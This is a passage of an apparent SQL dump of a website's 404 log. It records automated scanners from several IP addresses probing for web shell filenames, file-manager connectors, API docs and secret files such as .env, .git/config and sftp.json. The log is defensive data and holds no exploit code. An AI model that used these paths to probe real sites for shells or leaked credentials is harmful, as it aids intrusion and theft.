10:38:27'),(613,'https://amb18b.com/.__info.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:29','2025-10-23 10:38:29'),(614,'https://amb18b.com/0.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:30','2025-10-23 10:38:30'),(615,'https://amb18b.com/07.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:32','2025-10-23 10:38:32'),(616,'https://amb18b.com/1.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:34','2025-10-23 10:38:34'),(617,'https://amb18b.com/123.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:35','2025-10-23 10:38:35'),(618,'https://amb18b.com/aa.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:37','2025-10-23 10:38:37'),(619,'https://amb18b.com/about.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:39','2025-10-23 10:38:39'),(620,'https://amb18b.com/admin.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:40','2025-10-23 10:38:40'),(621,'https://amb18b.com/adminfuns.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:42','2025-10-23 10:38:42'),(622,'https://amb18b.com/akc.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:44','2025-10-23 10:38:44'),(623,'https://amb18b.com/akcc.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:45','2025-10-23 10:38:45'),(624,'https://amb18b.com/asasx.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:47','2025-10-23 10:38:47'),(625,'https://amb18b.com/asd.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:49','2025-10-23 10:38:49'),(626,'https://amb18b.com/atomlib.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:51','2025-10-23 10:38:51'),(627,'https://amb18b.com/autoload_classmap.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:52','2025-10-23 10:38:52'),(628,'https://amb18b.com/axx.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:54','2025-10-23 10:38:54'),(629,'https://amb18b.com/berax.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:56','2025-10-23 10:38:56'),(630,'https://amb18b.com/build.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:58','2025-10-23 10:38:58'),(631,'https://amb18b.com/buy.php','52.176.88.217','Direct Access',1,'2025-10-23 10:38:59','2025-10-23 10:38:59'),(632,'https://amb18b.com/checkbox.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:01','2025-10-23 10:39:01'),(633,'https://amb18b.com/chosen.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:03','2025-10-23 10:39:03'),(634,'https://amb18b.com/classwithtostring.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:04','2025-10-23 10:39:04'),(635,'https://amb18b.com/cong.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:06','2025-10-23 10:39:06'),(636,'https://amb18b.com/css.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:08','2025-10-23 10:39:08'),(637,'https://amb18b.com/dropdown.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:09','2025-10-23 10:39:09'),(638,'https://amb18b.com/edit.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:11','2025-10-23 10:39:11'),(639,'https://amb18b.com/file2.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:13','2025-10-23 10:39:13'),(640,'https://amb18b.com/file4.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:15','2025-10-23 10:39:15'),(641,'https://amb18b.com/filemanager.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:16','2025-10-23 10:39:16'),(642,'https://amb18b.com/flower.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:18','2025-10-23 10:39:18'),(643,'https://amb18b.com/form.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:20','2025-10-23 10:39:20'),(644,'https://amb18b.com/gecko.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:21','2025-10-23 10:39:21'),(645,'https://amb18b.com/kyami.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:23','2025-10-23 10:39:23'),(646,'https://amb18b.com/makeasmtp.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:25','2025-10-23 10:39:25'),(647,'https://amb18b.com/manager.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:26','2025-10-23 10:39:26'),(648,'https://amb18b.com/mari.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:28','2025-10-23 10:39:28'),(649,'https://amb18b.com/moon.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:30','2025-10-23 10:39:30'),(650,'https://amb18b.com/nc4.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:32','2025-10-23 10:39:32'),(651,'https://amb18b.com/new.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:33','2025-10-23 10:39:33'),(652,'https://amb18b.com/wp-admin.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:37','2025-10-23 10:39:37'),(653,'https://amb18b.com/wp-trackback.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:38','2025-10-23 10:39:38'),(654,'https://amb18b.com/xmrlpc.php','52.176.88.217','Direct Access',1,'2025-10-23 10:39:41','2025-10-23 10:39:41'),(655,'https://amb18b.com/elfinder/php/connector.minimal.php','46.62.104.139','Direct Access',2,'2025-10-23 15:51:06','2025-10-23 15:51:06'),(656,'https://amb18b.com/ves_base/elfinder/php/connector.php','46.62.104.139','Direct Access',1,'2025-10-23 15:51:06','2025-10-23 15:51:06'),(657,'https://amb18b.com/themes/theme_back/js/plugins/elfinder/php/connector.minimal.php','46.62.104.139','Direct Access',1,'2025-10-23 15:51:06','2025-10-23 15:51:06'),(658,'https://amb18b.com/graphql','139.59.136.184','Direct Access',1,'2025-10-23 17:33:07','2025-10-23 17:33:07'),(659,'https://amb18b.com/api','139.59.136.184','Direct Access',1,'2025-10-23 17:33:08','2025-10-23 17:33:08'),(660,'https://amb18b.com/api/graphql','139.59.136.184','Direct Access',1,'2025-10-23 17:33:09','2025-10-23 17:33:09'),(661,'https://amb18b.com/graphql/api','139.59.136.184','Direct Access',1,'2025-10-23 17:33:11','2025-10-23 17:33:11'),(662,'https://amb18b.com/api/gql','139.59.136.184','Direct Access',1,'2025-10-23 17:33:12','2025-10-23 17:33:12'),(663,'https://amb18b.com/swagger-ui.html','139.59.136.184','Direct Access',1,'2025-10-23 17:33:13','2025-10-23 17:33:13'),(664,'https://amb18b.com/swagger/index.html','139.59.136.184','Direct Access',1,'2025-10-23 17:33:14','2025-10-23 17:33:14'),(665,'https://amb18b.com/swagger/swagger-ui.html','139.59.136.184','Direct Access',1,'2025-10-23 17:33:16','2025-10-23 17:33:16'),(666,'https://amb18b.com/webjars/swagger-ui/index.html','139.59.136.184','Direct Access',1,'2025-10-23 17:33:17','2025-10-23 17:33:17'),(667,'https://amb18b.com/swagger.json','139.59.136.184','Direct Access',1,'2025-10-23 17:33:17','2025-10-23 17:33:17'),(668,'https://amb18b.com/swagger/v1/swagger.json','139.59.136.184','Direct Access',1,'2025-10-23 17:33:18','2025-10-23 17:33:18'),(669,'https://amb18b.com/v2/api-docs','139.59.136.184','Direct Access',1,'2025-10-23 17:33:20','2025-10-23 17:33:20'),(670,'https://amb18b.com/v3/api-docs','139.59.136.184','Direct Access',1,'2025-10-23 17:33:21','2025-10-23 17:33:21'),(671,'https://amb18b.com/api-docs/swagger.json','139.59.136.184','Direct Access',1,'2025-10-23 17:33:22','2025-10-23 17:33:22'),(672,'https://amb18b.com/@vite/env','139.59.136.184','Direct Access',1,'2025-10-23 17:33:23','2025-10-23 17:33:23'),(673,'https://amb18b.com/actuator/env','139.59.136.184','Direct Access',1,'2025-10-23 17:33:24','2025-10-23 17:33:24'),(674,'https://amb18b.com/server','139.59.136.184','Direct Access',1,'2025-10-23 17:33:26','2025-10-23 17:33:26'),(675,'https://amb18b.com/.vscode/sftp.json','139.59.136.184','Direct Access',1,'2025-10-23 17:33:27','2025-10-23 17:33:27'),(676,'https://amb18b.com/about','139.59.136.184','Direct Access',1,'2025-10-23 17:33:28','2025-10-23 17:33:28'),(677,'https://amb18b.com/debug/default/view?panel=config','139.59.136.184','Direct Access',1,'2025-10-23 17:33:30','2025-10-23 17:33:30'),(678,'https://amb18b.com/v2/_catalog','139.59.136.184','Direct Access',1,'2025-10-23 17:33:31','2025-10-23 17:33:31'),(679,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','139.59.136.184','Direct Access',1,'2025-10-23 17:33:32','2025-10-23 17:33:32'),(680,'https://amb18b.com/server-status','139.59.136.184','Direct Access',1,'2025-10-23 17:33:34','2025-10-23 17:33:34'),(681,'https://amb18b.com/login.action','139.59.136.184','Direct Access',1,'2025-10-23 17:33:34','2025-10-23 17:33:34'),(682,'https://amb18b.com/_all_dbs','139.59.136.184','Direct Access',1,'2025-10-23 17:33:36','2025-10-23 17:33:36'),(683,'https://amb18b.com/.DS_Store','139.59.136.184','Direct Access',1,'2025-10-23 17:33:37','2025-10-23 17:33:37'),(684,'https://amb18b.com/.env','139.59.136.184','Direct Access',1,'2025-10-23 17:33:38','2025-10-23 17:33:38'),(685,'https://amb18b.com/.git/config','139.59.136.184','Direct Access',1,'2025-10-23 17:33:39','2025-10-23 17:33:39'),(686,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','139.59.136.184','Direct Access',1,'2025-10-23 17:33:40','2025-10-23 17:33:40'),(687,'https://amb18b.com/config.json','139.59.136.184','Direct Access',1,'2025-10-23 17:33:41','2025-10-23 17:33:41'),(688,'https://amb18b.com/telescope/requests','139.59.136.184','Direct Access',1,'2025-10-23 17:33:43','2025-10-23 17:33:43'),(689,'https://amb18b.com/info.php','139.59.136.184','Direct Access',1,'2025-10-23 17:33:44','2025-10-23 17:33:44'),(690,'https://amb18b.com/main/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:42','2025-10-23 19:16:42'),(691,'https://amb18b.com/media/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:43','2025-10-23 19:16:43'),(692,'https://amb18b.com/backup/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:45','2025-10-23 19:16:45'),(693,'https://amb18b.com/2023/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:46','2025-10-23 19:16:46'),(694,'https://amb18b.com/2024/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:47','2025-10-23 19:16:47'),(695,'https://amb18b.com/wordpress/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:48','2025-10-23 19:16:48'),(696,'https://amb18b.com/site/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:49','2025-10-23 19:16:49'),(697,'https://amb18b.com/new/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:50','2025-10-23 19:16:50'),(698,'https://amb18b.com/site1/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:52','2025-10-23 19:16:52'),(699,'https://amb18b.com/press/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:53','2025-10-23 19:16:53'),(700,'https://amb18b.com/blog/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:54','2025-10-23 19:16:54'),(701,'https://amb18b.com/portal/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:55','2025-10-23 19:16:55'),(702,'https://amb18b.com/news/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:56','2025-10-23 19:16:56'),(703,'https://amb18b.com/cms/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:57','2025-10-23 19:16:57'),(704,'https://amb18b.com/shop/','13.90.242.90','Direct Access',1,'2025-10-23 19:16:59','2025-10-23 19:16:59'),(705,'https://amb18b.com/us/','13.90.242.90','Direct Access',1,'2025-10-23 19:17:00','2025-10-23 19:17:00'),(706,'https://amb18b.com/store/','13.90.242.90','Direct Access',1,'2025-10-23 19:17:01','2025-10-23 19:17:01'),(707,'https://amb18b.com/blog2/','13.90.242.90','Direct Access',1,'2025-10-23 19:17:02','2025-10-23 19:17:02'),(708,'https://amb18b.com/v2/','13.90.242.90','Direct Access',1,'2025-10-23 19:17:03','2025-10-23 19:17:03'),(709,'https://amb18b.com/content/','13.90.242.90','Direct Access',1,'2025-10-23 19:17:04','2025-10-23 19:17:04'),(710,'https://amb18b.com/wp/','13.90.242.90','Direct Access',1,'2025-10-23 19:17:06','2025-10-23 19:17:06'),(711,'https://amb18b.com/old/','13.90.242.90','Direct Access',1,'2025-10-23 19:17:07','2025-10-23 19:17:07'),(712,'https://amb18b.com/de/','13.90.242.90','Direct Access',1,'2025-10-23 19:17:09','2025-10-23 19:17:09'),(713,'https://amb18b.com/en/','13.90.242.90','Direct Access',1,'2025-10-23 19:17:11','2025-10-23 19:17:11'),(714,'https://amb18b.com/web/','13.90.242.90','Direct Access',1,'2025-10-23 19:17:12','2025-10-23 19:17:12'),(715,'https://amb18b.com/fr/','13.90.242.90','Direct Access',1,'2025-10-23 19:17:13','2025-10-23 19:17:13'),(716,'https://amb18b.com/website/','13.90.242.90','Direct Access',1,'2025-10-23 19:17:14','2025-10-23 19:17:14'),(717,'https://amb18b.com/wp-admin/asasx.php','13.89.129.89','Direct Access',1,'2025-10-23 20:05:21','2025-10-23 20:05:21'),(718,'https://amb18b.com/wp-admin/alfa.php','13.89.129.89','Direct Access',1,'2025-10-23 20:05:27','2025-10-23 20:05:27'),(719,'https://amb18b.com/wp-admin/atomlib.php','13.89.129.89','Direct Access',1,'2025-10-23 20:05:32','2025-10-23 20:05:32'),(720,'https://amb18b.com/wp-admin/ab.php','13.89.129.89','Direct Access',1,'2025-10-23 20:05:39','2025-10-23 20:05:39'),(721,'https://amb18b.com/wp-admin/akc.php','13.89.129.89','Direct Access',1,'2025-10-23 20:05:41','2025-10-23 20:05:41'),(722,'https://amb18b.com/wp-admin/file2.php','13.89.129.89','Direct Access',1,'2025-10-23 20:05:46','2025-10-23 20:05:46'),(723,'https://amb18b.com/wp-admin/wsa.php','13.89.129.89','Direct Access',1,'2025-10-23 20:05:48','2025-10-23 20:05:48'),(724,'https://amb18b.com/wp-admin/mm.php','13.89.129.89','Direct Access',1,'2025-10-23 20:05:50','2025-10-23 20:05:50'),(725,'https://amb18b.com/wp-admin/wp.php','13.89.129.89','Direct Access',1,'2025-10-23 20:05:51','2025-10-23 20:05:51'),(726,'https://amb18b.com/wp-admin/abcd.php','13.89.129.89','Direct Access',1,'2025-10-23 20:05:53','2025-10-23 20:05:53'),(727,'https://amb18b.com/wp-admin/lock360.php','13.89.129.89','Direct Access',1,'2025-10-23 20:05:55','2025-10-23 20:05:55'),(728,'https://amb18b.com/wp-admin/classwithtostring.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:02','2025-10-23 20:06:02'),(729,'https://amb18b.com/wp-admin/function.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:03','2025-10-23 20:06:03'),(730,'https://amb18b.com/wp-admin/moon.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:05','2025-10-23 20:06:05'),(731,'https://amb18b.com/wp-admin/flower.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:15','2025-10-23 20:06:15'),(732,'https://amb18b.com/wp-admin/buy.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:17','2025-10-23 20:06:17'),(733,'https://amb18b.com/wp-admin/cong.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:26','2025-10-23 20:06:26'),(734,'https://amb18b.com/wp-admin/autoload_classmap.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:28','2025-10-23 20:06:28'),(735,'https://amb18b.com/wp-admin/file.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:30','2025-10-23 20:06:30'),(736,'https://amb18b.com/wp-admin/makeasmtp.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:42','2025-10-23 20:06:42'),(737,'https://amb18b.com/wp-admin/w.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:44','2025-10-23 20:06:44'),(738,'https://amb18b.com/wp-admin/chosen.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:50','2025-10-23 20:06:50'),(739,'https://amb18b.com/wp-admin/goat.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:52','2025-10-23 20:06:52'),(740,'https://amb18b.com/wp-admin/gecko.php','13.89.129.89','Direct Access',1,'2025-10-23 20:06:59','2025-10-23 20:06:59'),(741,'https://amb18b.com/wp-admin/goods.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:10','2025-10-23 20:07:10'),(742,'https://amb18b.com/wp-admin/bala.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:12','2025-10-23 20:07:12'),(743,'https://amb18b.com/wp-admin/aa.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:15','2025-10-23 20:07:15'),(744,'https://amb18b.com/wp-admin/autoload_classmap/function.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:17','2025-10-23 20:07:17'),(745,'https://amb18b.com/wp-admin/ioxi-o.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:20','2025-10-23 20:07:20'),(746,'https://amb18b.com/wp-admin/ova.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:22','2025-10-23 20:07:22'),(747,'https://amb18b.com/wp-admin/tinyfilemanager.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:31','2025-10-23 20:07:31'),(748,'https://amb18b.com/aa.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:33','2025-10-23 20:07:33'),(749,'https://amb18b.com/abcd.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:35','2025-10-23 20:07:35'),(750,'https://amb18b.com/about.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:37','2025-10-23 20:07:37'),(751,'https://amb18b.com/admin.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:38','2025-10-23 20:07:38'),(752,'https://amb18b.com/alfa.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:40','2025-10-23 20:07:40'),(753,'https://amb18b.com/chosen.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:42','2025-10-23 20:07:42'),(754,'https://amb18b.com/classwithtostring.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:43','2025-10-23 20:07:43'),(755,'https://amb18b.com/code.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:45','2025-10-23 20:07:45'),(756,'https://amb18b.com/edit.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:47','2025-10-23 20:07:47'),(757,'https://amb18b.com/file.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:48','2025-10-23 20:07:48'),(758,'https://amb18b.com/flower.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:50','2025-10-23 20:07:50'),(759,'https://amb18b.com/goods.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:52','2025-10-23 20:07:52'),(760,'https://amb18b.com/ioxi-o.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:53','2025-10-23 20:07:53'),(761,'https://amb18b.com/moon.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:55','2025-10-23 20:07:55'),(762,'https://amb18b.com/w.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:57','2025-10-23 20:07:57'),(763,'https://amb18b.com/wp-admin/css/colors/blue/index.php','13.89.129.89','Direct Access',1,'2025-10-23 20:07:58','2025-10-23 20:07:58'),(764,'https://amb18b.com/wp-admin/js/widgets/','13.89.129.89','Direct Access',1,'2025-10-23 20:08:00','2025-10-23 20:08:00'),(765,'https://amb18b.com/wp-admin/network/chosen.php','13.89.129.89','Direct Access',1,'2025-10-23 20:08:02','2025-10-23 20:08:02'),(766,'https://amb18b.com/wp-includes/blocks/comments/','13.89.129.89','Direct Access',1,'2025-10-23 20:08:10','2025-10-23 20:08:10'),(767,'https://amb18b.com/wp-setup.php','13.89.129.89','Direct Access',1,'2025-10-23 20:08:12','2025-10-23 20:08:12'),(768,'https://amb18b.com/wp.php','13.89.129.89','Direct Access',1,'2025-10-23 20:08:14','2025-10-23 20:08:14'),(769,'https://amb18b.com/wsa.php','13.89.129.89','Direct Access',1,'2025-10-23 20:08:16','2025-10-23 20:08:16'),(770,'https://amb18b.com/wp-cli.phar','176.15.132.227','Direct Access',1,'2025-10-23 20:25:33','2025-10-23 20:25:33'),(771,'https://amb18b.com/wp-cli.php','176.15.132.227','Direct Access',1,'2025-10-23 20:25:34','2025-10-23 20:25:34'),(772,'https://amb18b.com/atomlib.php','23.102.71.189','Direct Access',1,'2025-10-23 20:35:50','2025-10-23 20:35:50'),(773,'https://amb18b.com/a.php','23.102.71.189','Direct Access',1,'2025-10-23 20:35:52','2025-10-23 20:35:52'),(774,'https://amb18b.com/v.php','23.102.71.189','Direct Access',1,'2025-10-23 20:35:54','2025-10-23 20:35:54'),(775,'https://amb18b.com/d2.php','23.102.71.189','Direct Access',1,'2025-10-23 20:35:56','2025-10-23 20:35:56'),(776,'https://amb18b.com/xc.php','23.102.71.189','Direct Access',1,'2025-10-23 20:35:58','2025-10-23 20:35:58'),(777,'https://amb18b.com/g.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:00','2025-10-23 20:36:00'),(778,'https://amb18b.com/gmo.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:02','2025-10-23 20:36:02'),(779,'https://amb18b.com/11.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:04','2025-10-23 20:36:04'),(780,'https://amb18b.com/20.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:06','2025-10-23 20:36:06'),(781,'https://amb18b.com/f35.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:08','2025-10-23 20:36:08'),(782,'https://amb18b.com/1.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:10','2025-10-23 20:36:10'),(783,'https://amb18b.com/c.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:12','2025-10-23 20:36:12'),(784,'https://amb18b.com/build.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:14','2025-10-23 20:36:14'),(785,'https://amb18b.com/bless.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:15','2025-10-23 20:36:15'),(786,'https://amb18b.com/admin/upload/css.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:17','2025-10-23 20:36:17'),(787,'https://amb18b.com/lock360.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:18','2025-10-23 20:36:18'),(788,'https://amb18b.com/4.php?p=','23.102.71.189','Direct Access',1,'2025-10-23 20:36:20','2025-10-23 20:36:20'),(789,'https://amb18b.com/about.php','23.102.71.189','Direct Access',2,'2025-10-23 20:38:06','2025-10-23 20:36:22'),(790,'https://amb18b.com/r.php','23.102.71.189','Direct Access',2,'2025-10-23 20:37:07','2025-10-23 20:36:24'),(791,'https://amb18b.com/v4.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:26','2025-10-23 20:36:26'),(792,'https://amb18b.com/wp-22.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:28','2025-10-23 20:36:28'),(793,'https://amb18b.com/makeasmtp.php?p=','23.102.71.189','Direct Access',1,'2025-10-23 20:36:31','2025-10-23 20:36:31'),(794,'https://amb18b.com/system_log.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:34','2025-10-23 20:36:34'),(795,'https://amb18b.com/NewFile.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:36','2025-10-23 20:36:36'),(796,'https://amb18b.com/t.php?p=','23.102.71.189','Direct Access',1,'2025-10-23 20:36:38','2025-10-23 20:36:38'),(797,'https://amb18b.com/ee.php','23.102.71.189','Direct Access',2,'2025-10-23 20:37:09','2025-10-23 20:36:41'),(798,'https://amb18b.com/2.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:43','2025-10-23 20:36:43'),(799,'https://amb18b.com//gmo.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:45','2025-10-23 20:36:45'),(800,'https://amb18b.com/6.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:47','2025-10-23 20:36:47'),(801,'https://amb18b.com/12.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:50','2025-10-23 20:36:50'),(802,'https://amb18b.com/0.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:52','2025-10-23 20:36:52'),(803,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','23.102.71.189','Direct Access',1,'2025-10-23 20:36:55','2025-10-23 20:36:55'),(804,'https://amb18b.com/wp-includes/js/codemirror/index.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:57','2025-10-23 20:36:57'),(805,'https://amb18b.com/02.php','23.102.71.189','Direct Access',1,'2025-10-23 20:36:59','2025-10-23 20:36:59'),(806,'https://amb18b.com/w.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:01','2025-10-23 20:37:01'),(807,'https://amb18b.com/go.php?p=','23.102.71.189','Direct Access',1,'2025-10-23 20:37:03','2025-10-23 20:37:03'),(808,'https://amb18b.com/public_html','23.102.71.189','Direct Access',1,'2025-10-23 20:37:05','2025-10-23 20:37:05'),(809,'https://amb18b.com/an.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:11','2025-10-23 20:37:11'),(810,'https://amb18b.com/wp.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:13','2025-10-23 20:37:13'),(811,'https://amb18b.com/admin.php','23.102.71.189','Direct Access',2,'2025-10-23 20:37:20','2025-10-23 20:37:18'),(812,'https://amb18b.com/wp-includes/Text/Diff/Engine/about.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:22','2025-10-23 20:37:22'),(813,'https://amb18b.com/index/function.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:24','2025-10-23 20:37:24'),(814,'https://amb18b.com/wp-includes/ID3/rk2.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:26','2025-10-23 20:37:26'),(815,'https://amb18b.com/license.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:28','2025-10-23 20:37:28'),(816,'https://amb18b.com/radio.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:30','2025-10-23 20:37:30'),(817,'https://amb18b.com/info.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:33','2025-10-23 20:37:33'),(818,'https://amb18b.com/alfanew.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:35','2025-10-23 20:37:35'),(819,'https://amb18b.com/inputs.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:37','2025-10-23 20:37:37'),(820,'https://amb18b.com/admin/function.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:39','2025-10-23 20:37:39'),(821,'https://amb18b.com/wp-includes/assets/index.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:41','2025-10-23 20:37:41'),(822,'https://amb18b.com/wp-admin/images/index.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:42','2025-10-23 20:37:42'),(823,'https://amb18b.com/default.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:44','2025-10-23 20:37:44'),(824,'https://amb18b.com/lv.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:46','2025-10-23 20:37:46'),(825,'https://amb18b.com/marijuana.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:49','2025-10-23 20:37:49'),(826,'https://amb18b.com/wp-includes/autoload_classmap.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:51','2025-10-23 20:37:51'),(827,'https://amb18b.com/css/colors/coffee/index.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:55','2025-10-23 20:37:55'),(828,'https://amb18b.com/css.php','23.102.71.189','Direct Access',1,'2025-10-23 20:37:58','2025-10-23 20:37:58'),(829,'https://amb18b.com/1.php?','23.102.71.189','Direct Access',1,'2025-10-23 20:38:09','2025-10-23 20:38:09'),(830,'https://amb18b.com/marijuana.php?','23.102.71.189','Direct Access',1,'2025-10-23 20:38:11','2025-10-23 20:38:11'),(831,'https://amb18b.com/about/function.php?','23.102.71.189','Direct Access',1,'2025-10-23 20:38:15','2025-10-23 20:38:15'),(832,'https://amb18b.com/simple.php','23.102.71.189','Direct Access',1,'2025-10-23 20:38:17','2025-10-23 20:38:17'),(833,'https://amb18b.com/goat1.php','23.102.71.189','Direct Access',1,'2025-10-23 20:38:20','2025-10-23 20:38:20'),(834,'https://amb18b.com/chosen.php?','23.102.71.189','Direct Access',1,'2025-10-23 20:38:22','2025-10-23 20:38:22'),(835,'https://amb18b.com/yanz.php','23.102.71.189','Direct Access',1,'2025-10-23 20:38:24','2025-10-23 20:38:24'),(836,'https://amb18b.com/config.php?','23.102.71.189','Direct Access',1,'2025-10-23 20:38:27','2025-10-23 20:38:27'),(837,'https://amb18b.com/network.php','23.102.71.189','Direct Access',1,'2025-10-23 20:38:29','2025-10-23 20:38:29'),(838,'https://amb18b.com/wp-2019.php?','23.102.71.189','Direct Access',1,'2025-10-23 20:38:31','2025-10-23 20:38:31'),(839,'https://amb18b.com/bypass.php','23.102.71.189','Direct Access',1,'2025-10-23 20:38:35','2025-10-23 20:38:35'),(840,'https://amb18b.com/wp-includes/IXR/admin.php','23.102.71.189','Direct Access',1,'2025-10-23 20:38:37','2025-10-23 20:38:37'),(841,'https://amb18b.com/wp-includes/theme-compat/wp-login.php','23.102.71.189','Direct Access',1,'2025-10-23 20:38:40','2025-10-23 20:38:40'),(842,'https://amb18b.com/tiny.php?p=','23.102.71.189','Direct Access',1,'2025-10-23 20:38:43','2025-10-23 20:38:43'),(843,'https://amb18b.com/lock.php','23.102.71.189','Direct Access',1,'2025-10-23 20:38:46','2025-10-23 20:38:46'),(844,'https://amb18b.com/mail.php?','23.102.71.189','Direct Access',1,'2025-10-23 20:38:49','2025-10-23 